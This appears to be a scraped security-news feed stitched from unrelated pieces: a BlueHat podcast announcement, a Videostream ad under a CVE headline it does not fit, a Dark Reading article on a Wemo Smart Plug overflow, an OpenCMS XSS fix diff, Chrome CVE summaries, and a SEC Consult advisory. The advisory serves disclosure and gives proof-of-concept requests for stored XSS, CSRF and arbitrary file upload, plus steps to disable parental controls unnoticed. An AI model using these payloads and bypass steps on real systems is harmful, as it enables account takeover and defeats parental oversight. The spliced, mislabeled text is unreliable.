Available today on all major podcast platforms is The BlueHat Podcast, a new series of security research focused conversations, continuing the themes from the BlueHat 2023 conference (session recordings available to watch here).
Since 2005, BlueHat has been where the security research community, and Microsoft, come together as peers: to debate, discuss, share, challenge, celebrate and learn.

Available today on all major podcast platforms is The BlueHat Podcast, a new series of security research focused conversations, continuing the themes from the BlueHat 2023 conference (session recordings available to watch here).

Since 2005, BlueHat has been where the security research community, and Microsoft, come together as peers: to debate, discuss, share, challenge, celebrate and learn.

And while the BlueHat event only happens once per year, The BlueHat Podcast will bring you the same valuable discussions with researchers and industry leaders, both inside and outside of Microsoft, working to secure the planet’s technology, and create a safer world for all.

To kick off the podcast we’re featuring a selection of speakers, attendees, and community leaders from the BlueHat 2023 conference starting with the one and only David Weston (@dwizzzleMSFT), Vice President, OS Security and Enterprise, who shares his thoughts on the importance of security research and the researcher community with respect to the Windows operating system in all its forms.

Google Project Zero’s James Forshaw (@tiraniddo) joins us in episode two to discuss why and how he creates his own security tools (and why you should too) as well as his journey into the world of security research. And in episode three, Cameron Vincent (@SecretlyHidden1) tells us how he went from full-time bug bounty hunter to Microsoft Security Researcher investigating suspected AuthZ/Authorization issues and presenting on the BlueHat 2023 stage.

Be sure to subscribe to hear upcoming episodes from BlueHat 2023 presenter and Phobos Group Founder and CTO Dan Tentler (@Viss) on how the tools and techniques from 2005 are still relevant today, and Raul Rojas (@ElJefeDSecurIT), Microsoft Principal Security PM on the role of security research within Microsoft’s Office of the CTO.

If you have feedback on the podcast or requests for a topic or person you’d like covered on a future episode, please email us at bluehat@microsoft.com.

So, join me, Nic Fillingham (@nicfill) and my co-host Wendy Zenone (@ZenOneSec), for The BlueHat Podcast wherever you listen to podcasts!

**Listen and Subscribe:**

Apple Podcasts: The BlueHat Podcast on Apple Podcasts

Spotify: The BlueHat Podcast on Spotify

Amazon Music: The BlueHat Podcast on Amazon Music

Google Podcasts: _Coming Soon_

iHeart Radio: The BlueHat Podcast on iHeart

Announcing The BlueHat Podcast: Listen and Subscribe Now!

Videostream macOS app 0.5.0 and 0.4.3 has a Race Condition. The Updater privileged script attempts to update Videostream every 5 hours.

**Downloaded videos on your Chromecast. Instantly.****The easiest way to stream

videos MP4s MKVs AVIs WMVs MP3s

from your computer to Chromecast or AndroidTV. 
Control it all from Android or iOS.**

 

Brooklyn Nine Nine © 2013-2015 Fremulon, Dr. Goor Productions (PG)

play\_arrow

No setup. Seriously. 
**Just start watching.**

event\_seat

**Relax with Mobile Apps**

Play, pause, & seek from your couch with **free** Android and iOS remotes.

**Play MKVs, AVIs, MP4s, MP3s...**

Videostream supports over 400 video and audio codecs out of the box. 
This means you can **play almost any video on your Chromecast!**

**...with no setup**

There's no pesky library setup or servers to install. 
There's no accounts to create or codecs to download. 
**Just choose a video and ...no really, that's it!** 
Start watching any video on your Chromecast in seconds, Install the Desktop App now!

Frozen © 2013 Walt Disney Animation Studios (G)

Suits © 2011-2015 Universal Cable (TV-14)

**Playlists, Subtitles, & Rainbows, 
Premium is Awesome.**

done

**Playlists:** Binge watch your favourite shows using playlists in Chrome

done

**Subtitles:** Get extra settings to change subtitle size and color

done

**Notifications:** Notifications on Android when your downloads finish

done

**Love:** Support (and feed!) our team of 7 developers in Canada! <3

**Start watching downloads on your Chromecast!**

**"It's the perfect app to stream your media to your Chromecasts"**

"No fiddling about with extra services, just find the file you want and have it play in the big screen." - Gizmodo

**It transformed my Chromecast from a Netflix and YouTube machine to a watch-whatever-I-want-machine. Which is great!**

\- Shonda, Videostream User

**Let me start by saying that I recently bought the lifetime premium membership and I absolutely love Videostream. It is my favorite thing in the world after pizza and Coca-Cola.**

\- Aldo, Videostream Premium User

**I have a very large movie collection on a networked drive, and it never fails to load the movies, cast them, load subtitles, etc. It's a piece of technology and media genius, so thank you all.**

\- Eliza, Videostream User

**I just wanted to say how much I love Videostream. I use it almost every day. Now that I can select files right from my phone, it is a completely hassle free experience.**

\- Rezaan, Videostream User

**People love Videostream. Try it yourself for free! 
**

**7 developers in Canada eh!?**

Just bunch of Canucks coding for the love of perfect streaming video <3

**Frequently Asked Questions**

Got questions? We have answers (if your answer isn't below, email us!)

**Do you play \_\_\_ files? (MKV, MP4, AVI, WMV...)**

Yup!! Videostream supports over 400 audio and video codecs so with almost complete certainty, yes.

**How much does it cost?**

Nothing, zip, zilch, nada, Videostream is completely free! If you're enjoying Videostream and want some extra features like playlists, extra subtitle settings, night mode, autoplay, and more, then Videostream Premium is for you!

**I have slow internet, will Videostream work?**

You bet! Since you are streaming video from your computer directly to your Chromecast or AndroidTV, Videostream doesn't use any of your internet bandwidth! That means no extra usage on your bill, no slowed down traffic on other devices.

**How do I setup Videostream?**

It's super simple! Open Google Chrome and then install Videostream. If you have an iPhone or Android phone you can check out our remote controls on those apps stores too!

**Does Videostream have playlists?!**

Is maple syrup sweet?! You bet! Playlists let you binge watch movies, tv shows, and even listen to music on your Chromecast. You can even shuffle or repeat your playlist! Grab your playlists in Videostream Premium, download and upgrade in the Desktop or Android App today!

**What if I have another question?**

Email us at \[email protected\]! Our awesome support bro Andrew will be sure to email you back with answers to your questions, solutions to your problems, and a random selection of cat pictures and gifs!

**Come on, it's what you bought your Chromecast for!**

CVE-2023-25394: What you bought your Chromecast for.

Cyberattckers can easily exploit a command-injection bug in the popular device, but Belkin has no plans to address the security vulnerability.

The Wemo Mini Smart Plug V2, which allows users to remotely control anything plugged into it via a mobile app, has a security vulnerability that allows cyberattackers to throw the switch on a variety of bad outcomes. Those include remotely turning electronics on and off, and the potential for moving deeper into an internal network, or hop-scotching to additional devices.

Used by consumers and businesses alike, the Smart Plug plugs into an existing outlet, and connects to an internal Wi-Fi network and to the broader Internet using Universal Plug-n-Play (UPNP) ports. Users can then control the device via a mobile app, essentially offering a way to make old-school lamps, fans, and other utility items "smart." The app integrates with Alexa, Google Assistant, and Apple Home Kit, while offering additional features like scheduling for convenience. 

The flaw (CVE-2023-27217) is a buffer-overflow vulnerability that affects model F7C063 of the device and allows remote command injection, according to researchers at Sternum who discovered it. Unfortunately, when they tapped the device maker, Belkin, for a fix, they were told that no firmware update would be forthcoming since the device is end-of-life.

"Meanwhile, it's safe to assume that many of these devices are still deployed in the wild," they explained in an analysis on May 16, citing the 17,000 reviews and the four-star rating the Smart Plug has on Amazon. "The total sales on Amazon alone should be in the hundreds of thousands."

Igal Zeifman, vice president of marketing for Sternum, tells Dark Reading that's a low estimate for the attack surface. "That's us being very conservative," he notes. "We had three in our lab alone when the research started. Those are now unplugged."

    

The Wemo Smart Plug turns regular lamps and such into "smart" devices.

He adds, "If businesses are using this version of the Wemo Plugin inside their network, they should stop or (at the very least) make sure that the Universal Plug-n-Play (UPNP) ports are not exposed to remote access. If that device plays a critical role or is connected to a critical network or asset, you are not in great shape."  

**CVE-2023-27217: What's in a Name?**

The bug exists in the way the firmware handles the naming of the Smart Plug. While "Wemo mini 6E9" is the default name of the device out of the box, users can rename it as they wish using what's designated in the firmware as the "FriendlyName" variable — changing it to "kitchen outlet" for example or similar.

"This option for user input already had our Spidey senses tingling, especially when we saw that changing the name in the app came with some guardrails, \[specifically a 30-character limit\]," Sternum researchers noted. "For us, this immediately raised two questions: 'Says who?' and 'What happens if we manage to make it more than 30 characters?'"

When the mobile app didn't allow them to create a name longer than 30 characters, they decided to connect directly to the device via pyWeMo, an open-source Python module for the discovery and control of WeMo devices. They found that circumventing the app allowed them to get around the guardrail, in order to successfully input a longer name.

"The restriction was only enforced by the app itself and not by the firmware code," they noted. "Input validation like this should not be managed just on the 'surface' level."

Observing how the overstuffed 'FriendlyName' variable was handled by the memory structure, the researchers saw that the metadata of the heap was being corrupted by any name longer than 80 characters. Those corrupted values were then being used in subsequent heap operations, thus leading to short crashes. This resulted in a buffer overflow and the ability to control the resulting memory re-allocation, according to the analysis.

"It's a good wake-up call about the risk of using connected devices without any on-device security, which is 99.9% of devices today," Zeifman says.

**Watch Out for Easy Exploitation**

While Sternum isn't releasing a proof-of-concept exploit or enumerating what a real-world attack flow would look like in practice, Zeifman says the vulnerability isn't difficult to exploit. An attacker would need either network access, or remote Universal Plug-n-Play access if the device is open to the Internet.

"Outside of that, it's a trivial buffer overflow on a device with an executable heap," he explains. "Harder bastions have fallen."

He noted that it's likely that attacks could be carried out via Wemo's cloud infrastructure option as well.

"Wemo products also implement a cloud protocol (basically a STUN tunnel) that was meant to circumvent network address traversal (NAT) and allow the mobile app to operate the outlet through the Internet," Zeifman says. "While we didn't look too deeply into Wemo's cloud protocol, we wouldn't be surprised if this attack could be implemented that way as well."

In the absence of a patch, device users do have some mitigations they can take; for instance, as long as the Smart Plug is not exposed to the Internet, the attacker would have to obtain access to the same network, which makes exploitation more complicated.

Sternum detailed the following common-sense recommendations:

*   Avoid exposing the Wemo Smart Plug V2 UPNP ports to the Internet, either directly or via port forwarding.
*   If you are using the Smart Plug V2 in a sensitive network, you should ensure that it is properly segmented, and that device cannot communicate with other sensitive devices on the same subnet.

**IoT Security Continues to Lag**

As far as broader takeaways from the research, the findings showcase the fact that Internet of Things (IoT) vendors are still struggling with security by design — which organizations should take into account when installing any smart device.

"I think this is the key point of this story: This is what happens when devices are shipped without any on-device protection," Zeifman notes. "If you only rely on responsive security patching, as most device manufacturers do today, two things are certain. One, you will always be one step behind the attacker; and two, one day those patches will stop coming."

IoT devices should be equipped with "the same level of endpoint security that we expect other assets to have, our desktops, laptops, servers, etc.," he says. "If your heart monitor is less secure than the gaming laptop, something has gone horribly wrong – and it has."

Unpatched Wemo Smart Plug Bug Opens Countless Networks to Cyberattacks

A stored cross-site scripting (XSS) vulnerability in alkacon-OpenCMS v11.0.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field under the Upload Image module.

Expand Up

@@ -39,6 +39,8 @@

import org.opencms.gwt.shared.CmsAdditionalInfoBean;

import org.opencms.gwt.shared.CmsListInfoBean;

 

import com.google.gwt.dom.client.Element;

import com.google.gwt.user.client.DOM;

import com.google.gwt.user.client.ui.HTML;

 

/\*\*

Expand Down Expand Up

@@ -155,6 +157,13 @@ public CmsResultItemWidget(CmsResultItemBean infoBean, boolean showPath) {

 

}

 

private static Element appendDom(Element parent, String name) {

 

Element child = DOM.createElement(name);

parent.appendChild(child);

return child;

}

 

/\*\*

\* Gets the image tile.

\*

Expand Down Expand Up

@@ -213,16 +222,17 @@ protected void onDetach() {

\*/

private String generateTooltipHtml(CmsListInfoBean infoBean) {

 

StringBuffer result = new StringBuffer();

result.append("").append(CmsClientStringUtil.shortenString(infoBean.getTitle(), 70)).append("");

Element root = DOM.createElement("div");

appendDom(appendDom(root, "p"), "b").setInnerText(CmsClientStringUtil.shortenString(infoBean.getTitle(), 70));

if (infoBean.hasAdditionalInfo()) {

for (CmsAdditionalInfoBean additionalInfo : infoBean.getAdditionalInfo()) {

result.append("").append(additionalInfo.getName()).append(":&nbsp;");

// shorten the value to max 45 characters

result.append(CmsClientStringUtil.shortenString(additionalInfo.getValue(), 45)).append("");

appendDom(root, "p").setInnerText(

additionalInfo.getName()

\+ ":\\u00a0"

\+ CmsClientStringUtil.shortenString(additionalInfo.getValue(), 45));

}

}

return result.toString();

return root.getInnerHTML();

}

 

/\*\*

Expand Down

CVE-2023-31544: Fixed XSS issue in gallery result view (github issue #652). · alkacon/opencms-core@21bfbea

Use after free in DevTools in Google Chrome prior to 113.0.5672.126 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2723

Inappropriate implementation in WebApp Installs in Google Chrome prior to 113.0.5672.126 allowed an attacker who convinced a user to install a malicious web app to bypass install dialog via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-2726

Type confusion in V8 in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2724

Use after free in Autofill UI in Google Chrome on Android prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2722

Use after free in Navigation in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

**Chrome Releases**

Release updates from the Chrome team

CVE-2023-2721: Stable Channel Update for Desktop

Kiddoware Kids Place Parental Control Android App versions 3.8.49 and below suffer from weak hashing, cross site request forgery, cross site scripting, and arbitrary file upload vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230515-0 > 
======================================================================= 
 title: Multiple Vulnerabilities 
 product: Kiddoware Kids Place Parental Control Android App 
 vulnerable version: <=3.8.49 
 fixed version: 3.8.50 or higher 
 CVE number: CVE-2023-28153, CVE-2023-29078, CVE-2023-29079 
 impact: High 
 homepage: https://kiddoware.com 
 found: 2022-09-29 
 by: Fabian Densborn (Office Vienna) 
 Bernhard Gründling (Office Vienna) 
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult. 
 SEC Consult is part of Eviden, an atos business 
 Europe | Asia | North America

 https://www.sec-consult.com

=======================================================================

Vendor description: 
------------------- 
"Kiddoware is the world’s leading parental control solutions company 
with a wide range of products and serving over 5 million families 
worldwide. Kiddoware is committed in helping you to protect your kids 
while providing you intelligence to be proactive about your childs’ 
online activities."

Source: https://kiddoware.com/

Business recommendation: 
------------------------ 
The vendor provides an update for the affected version(s) which 
should be installed immediately.

An in-depth security analysis performed by security professionals is 
highly advised, to identify and resolve potential further critical security 
issues.

The issues identified in this application were part of our blog post 
"The hidden costs of parental control apps" published a few months ago: 
https://r.sec-consult.com/parents

Vulnerability overview/description: 
----------------------------------- 
1) Login and registration returns password as MD5 hash 
Login and registration requests return the unsalted MD5 hash 
of the password. This indicates that the passwords are stored 
in an insecure format at the server. Furthermore, MD5 hashing 
should not be used anymore in modern applications.

2) Stored XSS via device name in parent Dashboard (CVE-2023-29079) 
The customizable name of the child's device can be used to 
trigger a XSS payload in the parent web dashboard. Children 
might be able to attack their parents' account.

3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078) 
All requests in the web dashboard are vulnerable to CSRF attacks. 
The requests contain the device Id of the child device which must 
be known to the attacker in order to successfully attack a child. 
But the device Id is not considered a secret, as it is used in 
the URL in some requests. An attacker could have obtained the Id 
through the browser history.

4) Arbitrary File Upload to AWS S3 bucket 
The web dashboard lets parents send files to the child's device. 
The selected file is uploaded to an AWS S3 bucket and the returned 
URL will be transmitted to the device which will then download it. 
It is possible to send arbitrary files to the child's device and 
thereby upload arbitrary files (size restriction ~10MB) to the 
AWS S3 bucket. The returned link is publicly available, so it is 
possible to use the server to spread malware.

5) Disable Child App Restriction without Parent's notice (CVE-2023-28153) 
The child can remove all restrictions temporarily without the parents noticing.

Proof of concept: 
----------------- 
1) Login and registration returns password as MD5 hash 
The "Change password" request looks as follows: 
-------------------------------------------------------------------------------- 
POST /account/change_password/ HTTP/1.1 
Host: kidsplace.kiddoware.com 
Cookie: [...] 
[...]

old_password=c869123c&new_password=password&confirm_password=password 
--------------------------------------------------------------------------------

The response from the web server contains the hashed, unsalted password: 
-------------------------------------------------------------------------------- 
{ 
 "error":null, 
 "result": 
 { 
 "email":"xxxxx@example.com", 
 "hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99", 
 "message":"Password successfully changed!" 
 }, 
 "status":200 
} 
--------------------------------------------------------------------------------

Proving this is an unsalted MD5 hash:

$ echo -n "password" | md5sum -t 
5f4dcc3b5aa765d61d8327deb882cf99 -

2) Stored XSS via device name in parent Dashboard (CVE-2023-29079) 
The device name can be changed by the child's account by sending a POST request 
to the API with the pushDeviceConfig method. The following payload can be used as 
a PoC to trigger an alert box on every page the device name is visible in the 
parent dashboard. Children/attackers would be able to take over their parents' 
accounts via this attack.

-------------------------------------------------------------------------------- 
POST /v2/api/ HTTP/1.1 
Host: kidsplace.kiddoware.com 
Content-Type: application/json; charset=utf-8 
Content-Length: 461 
Accept-Encoding: gzip, deflate 
User-Agent: okhttp/3.12.8 
Connection: close

{ 
 "method":"pushDeviceConfig", 
 "id":null, 
 "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9", 
 { 
 "isGPSEnabled":false,"deviceGCMRegID":"", 
 "deviceUserAgeRange":3, 
 "deviceName":"\"><img src=x onerror=\"alert(1)\"/>", 
 [...] 
 } 
} 
--------------------------------------------------------------------------------

3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078) 
As an example, an attacker can abuse the CSRF vulnerability to download an 
arbitrary file to a child's device. It is simply needed to create a form which 
automatically submits on page load. If a parent is logged in the web dashboard 
and visits this malicious site, the authenticated request will be sent and the 
file specified in the URL parameter will be downloaded by the child's device.

-------------------------------------------------------------------------------- 
POST /account/push_content/ HTTP/1.1 
Host: kidsplace.kiddoware.com 
Cookie: [...] 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 
Accept: application/json, text/javascript, */*; q=0.01 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 
Origin: https://kidsplace.kiddoware.com 
Content-Length: 75 
Connection: close

url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX 
--------------------------------------------------------------------------------

4) Arbitrary File Upload to AWS S3 bucket 
The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket 
and push it to the child device. 
-------------------------------------------------------------------------------- 
POST /account/push_content_file/ HTTP/1.1 
Host: kidsplace.kiddoware.com 
Cookie: [...] 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 
Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551 
Origin: https://kidsplace.kiddoware.com 
Content-Length: 296 
[...]

-----------------------------27687116714103572458683268551 
Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt" 
Content-Type: text/plain

<eicar-file> 
-----------------------------27687116714103572458683268551-- 
--------------------------------------------------------------------------------

The upload of the eicar file worked without errors and could subsequently also be 
downloaded via the returned link. So there is no antivirus scan on the uploaded files.

5) Disable Child App Restriction without Parent's notice (CVE-2023-28153) 
The child can disable the restrictions of the application without the parents noticing. 
For this, the following steps are necessary: 
a) If Android settings are blocked, reboot into Android Safe Mode. 
b) Disable "Display over other apps" Permission for the app in Android settings. 
c) After rebooting into normal mode, the child device can be used without restrictions.

For example, previously locked apps can now be used. To notice the problem, the parent 
has to check the parent's dashboard manually, a notification is not sent. If the child 
turns the permission back on in the meantime, the bypass will go unnoticed.

Vulnerable / tested versions: 
----------------------------- 
The following version has been tested and downloaded through Google Play store, which was 
the most recent version available at the time of the test: 
* 3.8.45

Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.

Vendor contact timeline: 
------------------------ 
2022-11-23: Contacting vendor through kiddoware@kiddoware.com and support@kiddoware.com 
 Asking for security contact. 
2022-11-23: Response received, requesting advisory to be submitted to an employee mail. 
 No encryption demanded. Advisory sent to vendor. 
2022-11-28: Vendor informs about ongoing backend rewrites and removing some 
 upload functionalities. Some fixes will be live by Q1 2023. 
 Everything will be addressed by end of 01-04-2023. 
2022-12-15: SEC Consult informs about upcoming blog post about parental control apps. 
2022-12-15: Vendor states that most of the issues have already been fixed. 
2022-12-16: Recheck of vulnerabilities shows that not all vulnerabilities 
 have been sufficiently addressed. Vendor was informed. 
2022-12-16: Vendor explains what security measures will be implemented and 
 informs SEC Consult as soon as this is done. 
2022-12-30: Vendor informs that fixes for the found vulnerabilities have been published. 
2023-01-11: SEC Consult rechecks the vulnerabilities and found out that the applied 
 patches are not sufficient. Again, informs the vendor about it. 
2023-02-14: No response from vendor, reminder sent. 
2023-02-14: Vendor informs SEC Consult that all issues have been resolved. 
2023-03-10: Requesting CVE numbers. 
2023-03-12: Assigned CVE number for "Disable child restriction" finding. 
2023-03-31: Assigned CVE numbers for XSS and CSRF findings. 
2023-05-15: Public release of security advisory.

Solution: 
--------- 
The vendor provides a patched version which should be installed immediately through Google 
Play store. 
* Version: 3.8.50 or higher

Workaround: 
----------- 
No workaround available.

Advisory URL: 
------------- 
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is part of Eviden, an atos business 
Europe | Asia | North America

About SEC Consult Vulnerability Lab 
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part 
of Eviden, an atos business. It ensures the continued knowledge gain of SEC 
Consult in the field of network and application security to stay ahead of the 
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration 
testing and the evaluation of new offensive and defensive technologies for our 
customers. Hence our customers obtain the most current information about 
vulnerabilities and valid recommendation about the risk profile of new 
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
Interested to work with the experts of SEC Consult? 
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult? 
Contact our local offices https://sec-consult.com/contact/ 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com 
Web: https://www.sec-consult.com 
Blog: http://blog.sec-consult.com 
Twitter: https://twitter.com/sec_consult

EOF F. Densborn, B. Gründling / @2023

Tag

#google